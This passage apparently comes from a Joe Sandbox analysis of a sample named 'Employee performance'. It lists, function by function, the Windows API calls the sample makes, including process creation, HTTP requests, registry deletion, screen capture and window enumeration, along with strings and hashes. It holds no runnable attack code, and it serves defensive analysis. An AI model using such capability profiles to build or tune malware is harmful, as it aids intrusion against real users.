_wcslen.LIBCMT ref: 0105B34B
_wcslen.LIBCMT ref: 0105B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0105B3B6
GetLastError.KERNEL32(00000000), ref: 0105B407
CloseHandle.KERNEL32(?), ref: 0105B439
CloseHandle.KERNEL32(00000000), ref: 0105B44A
CloseHandle.KERNEL32(00000000), ref: 0105B45C
CloseHandle.KERNEL32(00000000), ref: 0105B46E
CloseHandle.KERNEL32(?), ref: 0105B4E3

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 7dabf42ad3bcbe8d89ff69504915617ae538a3ef77b0d9c8c417a6a00133c509
Instruction ID: e278f3b778e2b693059f0bca699bd4089db9f516256ab12c1244da96791a6096
Opcode Fuzzy Hash: 7dabf42ad3bcbe8d89ff69504915617ae538a3ef77b0d9c8c417a6a00133c509
Instruction Fuzzy Hash: B2F19D716043409FD764EF28C881B6FBBE6AF85310F18855EF9D59B2A2DB35E804CB52

Function 00FD326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(010A1990), ref: 01012F8D
GetMenuItemCount.USER32(010A1990), ref: 0101303D
GetCursorPos.USER32(?), ref: 01013081
SetForegroundWindow.USER32(00000000), ref: 0101308A
TrackPopupMenuEx.USER32(010A1990,00000000,?,00000000,00000000,00000000), ref: 0101309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 010130A9

Strings

0, xrefs: 00FD327D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 5f2aeaac9e9ca696e6b89aa38991d48d9d5ab56f14979e9a2abc6c85f55628f9
Instruction ID: 6cfa76654f6a1f831faecb9aaea601050190b2bc413876d748d78d9f3ce0db24
Opcode Fuzzy Hash: 5f2aeaac9e9ca696e6b89aa38991d48d9d5ab56f14979e9a2abc6c85f55628f9
Instruction Fuzzy Hash: 25714B31640209BEFB319F28CC49FAABFA9FF05324F244217F6946A2D4C7B5A850DB51

Function 01066CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 01066DEB

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 01066E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 01066E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01066E94
DestroyWindow.USER32(?), ref: 01066EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FD0000,00000000), ref: 01066EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01066EFD
GetDesktopWindow.USER32 ref: 01066F16
GetWindowRect.USER32(00000000), ref: 01066F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 01066F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 01066F4D

Part of subcall function 00FE9944: GetWindowLongW.USER32(?,000000EB), ref: 00FE9952

Strings

tooltips_class32, xrefs: 01066E58, 01066EDD
0, xrefs: 01066D98

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 425636902746d9bb75210c8a1f41bcc4c1ed97d79adbc6c06adcb4f216309c0d
Instruction ID: 7dc5190c4b6550edc25dd9f1593d53c40e546bfd0c9db9639aeb50c85c65af19
Opcode Fuzzy Hash: 425636902746d9bb75210c8a1f41bcc4c1ed97d79adbc6c06adcb4f216309c0d
Instruction Fuzzy Hash: B8717670104244AFEB21CF1CC844EAABBE9FB89304F84045EFADA87261C776E906DB15

Function 0106911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FE9BB2

DragQueryPoint.SHELL32(?,?), ref: 01069147

Part of subcall function 01067674: ClientToScreen.USER32(?,?), ref: 0106769A
Part of subcall function 01067674: GetWindowRect.USER32(?,?), ref: 01067710
Part of subcall function 01067674: PtInRect.USER32(?,?,01068B89), ref: 01067720

SendMessageW.USER32(?,000000B0,?,?), ref: 010691B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 010691BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 010691DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 01069225
SendMessageW.USER32(?,000000B0,?,?), ref: 0106923E
SendMessageW.USER32(?,000000B1,?,?), ref: 01069255
SendMessageW.USER32(?,000000B1,?,?), ref: 01069277
DragFinish.SHELL32(?), ref: 0106927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 01069371

Strings

@GUI_DROPID, xrefs: 0106929E
@GUI_DRAGID, xrefs: 010692E9
@GUI_DRAGFILE, xrefs: 01069320

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 7d2a8afae115f81893474596dbdb97d5cfb7de4911806192281b1de2e1c03bc2
Instruction ID: 08a3cc4d85e15daa0544c5205a7a6b72b7feb42fc46311021e80bffcce3216e4
Opcode Fuzzy Hash: 7d2a8afae115f81893474596dbdb97d5cfb7de4911806192281b1de2e1c03bc2
Instruction Fuzzy Hash: A5618871108302AFD701DFA0DC85DAFBBE9EF88750F40091EF5D5922A0DB759A48CB62

Function 0104C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0104C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0104C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0104C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0104C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0104C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0104C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0104C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0104C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0104C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0104C5F0
InternetCloseHandle.WININET(00000000), ref: 0104C5FB

Strings

, xrefs: 0104C575

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 133f62c79c8051774763b1ff7d9784254f43eef04b1090390cdbee67f52394bf
Instruction ID: 2c5e97e0db1465ef6c33940033df444e73322b13ffa59dcbfa0f3245b9d19c04
Opcode Fuzzy Hash: 133f62c79c8051774763b1ff7d9784254f43eef04b1090390cdbee67f52394bf
Instruction Fuzzy Hash: DF513FB1501605BFFB219F65CA88AAF7BFCFF08754F008429F9C696150DB39E9449BA0

Function 0106856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 01068592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010685A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010685AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010685BA
GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010685C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010685D7
GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010685E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010685E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 010685F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0106FC38,?), ref: 01068611
GlobalFree.KERNEL32(00000000), ref: 01068621
GetObjectW.GDI32(?,00000018,?), ref: 01068641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 01068671
DeleteObject.GDI32(?), ref: 01068699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 010686AF

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 2afcfd496e45bcedcbbc5e9e2a9571e3039aa916ea6a9778ef31fd26513e416c
Instruction ID: 381731c07dbf9b1b6bd5ef29cf878481826be3b9ae0c107988d71b44e5bafb2e
Opcode Fuzzy Hash: 2afcfd496e45bcedcbbc5e9e2a9571e3039aa916ea6a9778ef31fd26513e416c
Instruction Fuzzy Hash: DF412B75600205AFEB219FA9CD48EAE7BBCEF89711F008059F989EB264D7359901CB20

Function 010414BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 01041502
VariantCopy.OLEAUT32(?,?), ref: 0104150B
VariantClear.OLEAUT32(?), ref: 01041517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 010415FB
VarR8FromDec.OLEAUT32(?,?), ref: 01041657
VariantInit.OLEAUT32(?), ref: 01041708
SysFreeString.OLEAUT32(?), ref: 0104178C
VariantClear.OLEAUT32(?), ref: 010417D8
VariantClear.OLEAUT32(?), ref: 010417E7
VariantInit.OLEAUT32(00000000), ref: 01041823

Strings

Default, xrefs: 010416AF
%4d%02d%02d%02d%02d%02d, xrefs: 01041625

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 4a5aba84edf031df09bd6891f1191b38be19da804575b1836c1ca3df7af9b91a
Instruction ID: d3173a3c65ca477d726e559941d04a0c35780443d6593e9cba3ae12d9e6ef2fd
Opcode Fuzzy Hash: 4a5aba84edf031df09bd6891f1191b38be19da804575b1836c1ca3df7af9b91a
Instruction Fuzzy Hash: 8CD1D5B1600219DBDB10DF65D8C5BBDBBF5BF05700F0880A6E9969B280DB35F885DBA1

Function 0105B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

Part of subcall function 0105C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0105B6AE,?,?), ref: 0105C9B5
Part of subcall function 0105C998: _wcslen.LIBCMT ref: 0105C9F1
Part of subcall function 0105C998: _wcslen.LIBCMT ref: 0105CA68
Part of subcall function 0105C998: _wcslen.LIBCMT ref: 0105CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0105B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0105B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0105B80A
RegCloseKey.ADVAPI32(?), ref: 0105B87E
RegCloseKey.ADVAPI32(?), ref: 0105B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0105B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0105B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0105B922
FreeLibrary.KERNEL32(00000000), ref: 0105B983
RegCloseKey.ADVAPI32(00000000), ref: 0105B994

Strings

advapi32.dll, xrefs: 0105B8ED
RegDeleteKeyExW, xrefs: 0105B8FE

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: de34fa4445113de9bbda7053546e1b94d6bc0cceaa6be09157573c7a800124ad
Instruction ID: c7bf221b8c651a94c59af0b9a54b8657daabf23e8fdc9eead26fd8ec05e55f83
Opcode Fuzzy Hash: de34fa4445113de9bbda7053546e1b94d6bc0cceaa6be09157573c7a800124ad
Instruction Fuzzy Hash: 17C17E34204201AFE750DF18C495F2ABBE2FF85308F18859DF9968B3A2CB75E945CB91

Function 0105255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 010525D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 010525E8
CreateCompatibleDC.GDI32(?), ref: 010525F4
SelectObject.GDI32(00000000,?), ref: 01052601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0105266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 010526AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 010526D0
SelectObject.GDI32(?,?), ref: 010526D8
DeleteObject.GDI32(?), ref: 010526E1
DeleteDC.GDI32(?), ref: 010526E8
ReleaseDC.USER32(00000000,?), ref: 010526F3

Strings

(, xrefs: 0105268D

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: de05cc31d4bf0c890573d861cccffcdc47fa4280ead0ae08b53ab0a0d8ce31f4
Instruction ID: 340f1eca7a52e99a22fad7b9326b7bdb71da08aa298bf5e0b8b468b35ab1a18a
Opcode Fuzzy Hash: de05cc31d4bf0c890573d861cccffcdc47fa4280ead0ae08b53ab0a0d8ce31f4
Instruction Fuzzy Hash: DA611375D00209EFDF15CFA8C984AAEBBF5FF48310F20852AE995A7250D775A940CFA0

Function 0100DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0100DAA1

Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D659
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D66B
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D67D
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D68F
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D6A1
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D6B3
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D6C5
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D6D7
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D6E9
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D6FB
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D70D
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D71F
Part of subcall function 0100D63C: _free.LIBCMT ref: 0100D731

_free.LIBCMT ref: 0100DA96

Part of subcall function 010029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000), ref: 010029DE
Part of subcall function 010029C8: GetLastError.KERNEL32(00000000,?,0100D7D1,00000000,00000000,00000000,00000000,?,0100D7F8,00000000,00000007,00000000,?,0100DBF5,00000000,00000000), ref: 010029F0

_free.LIBCMT ref: 0100DAB8
_free.LIBCMT ref: 0100DACD
_free.LIBCMT ref: 0100DAD8
_free.LIBCMT ref: 0100DAFA
_free.LIBCMT ref: 0100DB0D
_free.LIBCMT ref: 0100DB1B
_free.LIBCMT ref: 0100DB26
_free.LIBCMT ref: 0100DB5E
_free.LIBCMT ref: 0100DB65
_free.LIBCMT ref: 0100DB82
_free.LIBCMT ref: 0100DB9A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 7586373440742a188416128a11defef2ef72900a5ccfee473940f1b847be0487
Instruction ID: cac6e923f02d539fe2cac0ffb1567042a6e23e09fd8a78abda6c82cc4b0169af
Opcode Fuzzy Hash: 7586373440742a188416128a11defef2ef72900a5ccfee473940f1b847be0487
Instruction Fuzzy Hash: 463139316046069FFB63AAB9E848B9A7BE9FF11250F244459E4C9D71D1DE35E880CB30

Function 0103365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0103369C
_wcslen.LIBCMT ref: 010336A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 01033797
GetClassNameW.USER32(?,?,00000400), ref: 0103380C
GetDlgCtrlID.USER32(?), ref: 0103385D
GetWindowRect.USER32(?,?), ref: 01033882
GetParent.USER32(?), ref: 010338A0
ScreenToClient.USER32(00000000), ref: 010338A7
GetClassNameW.USER32(?,?,00000100), ref: 01033921
GetWindowTextW.USER32(?,?,00000400), ref: 0103395D

Strings

%s%u, xrefs: 01033734

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 9ce791be66b255f20b664ed96d02188ea400c0aa6850e23976d63df9a956c123
Instruction ID: 4b09bec1805f56015a79183c4c2ff7c88d6124fe231a6e9e81ba8dd5ad769c7b
Opcode Fuzzy Hash: 9ce791be66b255f20b664ed96d02188ea400c0aa6850e23976d63df9a956c123
Instruction Fuzzy Hash: BA91A271204606EFE715DF28C884BAAF7ECFF84310F00851AFAD9DA150DB34A945CB91

Function 01034954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 01034994
GetWindowTextW.USER32(?,?,00000400), ref: 010349DA
_wcslen.LIBCMT ref: 010349EB
CharUpperBuffW.USER32(?,00000000), ref: 010349F7
_wcsstr.LIBVCRUNTIME ref: 01034A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 01034A64
GetWindowTextW.USER32(?,?,00000400), ref: 01034A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 01034AE6
GetClassNameW.USER32(?,?,00000400), ref: 01034B20
GetWindowRect.USER32(?,?), ref: 01034B8B

Strings

ThumbnailClass, xrefs: 01034A6F, 01034AF1

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 907ff7ef1d06aaa36869c5c7fbe512c484ab155caa90cc8e81bc720c9b713c01
Instruction ID: fff677af2c5f0cf1fdda20fef021db7c635eb97b86451075a83163b9b47b721f
Opcode Fuzzy Hash: 907ff7ef1d06aaa36869c5c7fbe512c484ab155caa90cc8e81bc720c9b713c01
Instruction Fuzzy Hash: 1791B2311042099FEB59DE18C980BAA7BECFF84314F0484AAFEC5DA196DB34E945CB61

Function 01068D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FE9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 01068D5A
GetFocus.USER32 ref: 01068D6A
GetDlgCtrlID.USER32(00000000), ref: 01068D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 01068E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 01068ECF
GetMenuItemCount.USER32(?), ref: 01068EEC
GetMenuItemID.USER32(?,00000000), ref: 01068EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 01068F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 01068F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01068FA1

Strings

0, xrefs: 01068E9F

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
